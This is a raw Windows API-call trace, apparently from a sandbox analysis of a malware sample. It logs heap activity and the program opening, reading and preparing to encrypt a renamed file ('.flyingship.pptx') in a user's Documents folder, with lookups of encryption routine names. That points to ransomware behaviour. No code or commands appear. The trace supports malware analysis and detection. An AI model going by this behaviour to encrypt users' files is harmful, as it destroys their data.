0 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0171.113] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0171.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0171.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0171.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0171.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0171.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k55l_7um1tyjpsga.flyingship.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0171.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0171.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0171.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0171.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0171.117] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0171.117] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xa7c0, lpOverlapped=0x0) returned 1 [0171.121] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0171.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7c0) returned 0xa7f018 [0171.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0171.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7c0) returned 0xa897e0 [0171.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0171.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7c0) returned 0xa7f018 [0171.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0171.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0171.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.124] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7c0) returned 0xa7f018 [0171.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0171.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0171.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7c0) returned 0x9c56c0 [0171.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0171.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0171.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0171.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0171.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0171.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.128] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0171.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0171.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0171.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.129] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0171.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.130] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 